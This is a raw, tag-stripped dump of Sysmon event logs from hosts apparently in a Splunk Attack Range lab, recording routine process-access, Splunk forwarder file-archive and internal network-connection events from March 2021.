21:49:32.724{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917433Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:33.840{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E725C91294B2E2EC961AD9B59CA6C10,SHA256=871C7A81849231C25F755C59317B6818CE8CCC5FA6A3DCBF9252181C422BF386,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638443Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:29.413{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57250-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638442Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:33.148{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66A6BD7A6F460B77FA60DE24C55B890F,SHA256=7B1F67369069EA073475A5634342BEEA795CEE01B760C50F5B739EFFAEF5DC46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638441Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:33.148{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0AF41BBA6F2D88214C3F9D6B7AAE2338,SHA256=21636F415C2A5A990049643F242BCA892C9F9DB52130F9668C829B6941AC6166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638440Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:33.054{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59A271C782ED4D379D92785752CC09C2,SHA256=66783E26C17486697489D82FC28431A08596CA5C11451E261E6A7BD399F56D6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917432Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:30.856{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1498-false10.0.1.12-8000- 10341000x80000000000000005917431Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:33.724{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917430Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:33.724{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917429Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:33.179{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54B9C515EA3B1CF5EAA8B1AAE41B2649,SHA256=31F82E9583CB8D8605DE8364C31132CF46423335C3207814A7446D8CEC6902B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917436Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:34.867{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55F3CBE07B747D271053161890F5AE17,SHA256=F2ABD69E14A5D10514C4E796C44B0F0E2849E17F43DEB4E44BF7577DAEA4614C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638444Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:34.070{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=833F5A4C3368D6112DE41E5976C6755C,SHA256=CD81761D922A1E64148629A6DD240EA5DB2743F7B07664F6AEA911C5C442EF51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917435Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:34.725{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917434Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:34.725{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917440Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:35.725{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917439Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:35.725{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917438Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:35.381{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=927F36D4A8F8DEB6EE490D44820943A7,SHA256=033879CE660EDF6AA96F0DD2435C74D17ABF87AD2109ADA0ADF7012CDF141377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917437Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:35.380{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=039B1257F7951452102764E8131E4313,SHA256=9923E7AE816219F997B01441601ABC3C2B127C43D6CEF3606BABE41F13C69736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638445Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:35.085{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B2DDFDC51F19238F2B20F650439A09B,SHA256=D29DAD48367F3858A0567F9AE489E47F643B9586A06715D03E8F8C94031C136F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917443Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:36.725{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917442Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:36.725{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917441Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:36.044{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10B883A369E87D383A1D82B46387F0B0,SHA256=08513D1242DC74F2686A331220736534382C1560AB22E5ADAA2DD92265A48B53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638446Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:36.101{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FA7DA202280E6D541A471605B48CB96,SHA256=1DDC1BCAC596897E5D3DDA9DCBB22211151359197F51C821942CD91C31275BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638447Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:37.116{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52DD6641A0FA108B40667F42C6F1B833,SHA256=95DD228195D4EDC9199AB1DDE9282858DC899B56307DC294F08B9806B0B8F2B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917446Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:37.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917445Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:37.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917444Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:37.095{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=010291480686D7CECFEF496EBCBBCE5E,SHA256=FEEE3252DBCDEF1A1B89BB7D48F9A61DE33698CECFC9E3A67779BA36754BB68B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917451Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:38.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917450Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:38.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917449Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:38.107{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51601D772A32214DA1A7E8A6A3512F3A,SHA256=C75949E2A0AD88347B4BF38F95D1FD131C5B8B007A660BA5C968C2EB262EB468,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638448Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:38.132{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D061DD182023F34530EC7A93A6DDBEF,SHA256=EA1FFA258D208F95ED18C3367700D08EC41A79C637F0DABA5DE841E51C9E1CEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917448Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:38.078{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917447Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:38.078{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917456Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:36.732{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1499-false10.0.1.12-8000- 10341000x80000000000000005917455Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:39.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917454Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:39.726{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917453Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:39.200{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B6C2D94501823D10B7751673A38BBD,SHA256=2B1D6902046AEF7353C0FA608A4CAC6753B360E217C2BBE5B726717600475119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638452Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:39.460{BFB545BB-B866-6058-1200-00000000AF01}1068NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BEB77B09A6B7759E6FD05CD4D197811B,SHA256=B657D4A84FA910724DE7A1B9D81607E7987BD5AC7500A717E93998DC8F08D798,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638451Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:39.148{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D603042E4D45D0FED1C4BEBFB01CFBA,SHA256=C79BB897656F4FE66005008576623C737C7238358F5EE86001DFBB1F494CFD74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638450Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:39.148{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66A6BD7A6F460B77FA60DE24C55B890F,SHA256=7B1F67369069EA073475A5634342BEEA795CEE01B760C50F5B739EFFAEF5DC46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638449Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:39.148{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9762B5F37D2FBAB14BD0BB014E7DC70C,SHA256=89A68FC8D4B27C877A888823721E95A54576F57BE1902E0C5BC2EF5D1385D26B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917452Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:39.058{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F791579EC6B75627F58047977D64E6D8,SHA256=654B982A5D1A9788649ADD3B03257CEFC00EF7E1480BE4E244E8AB24335925A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917459Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 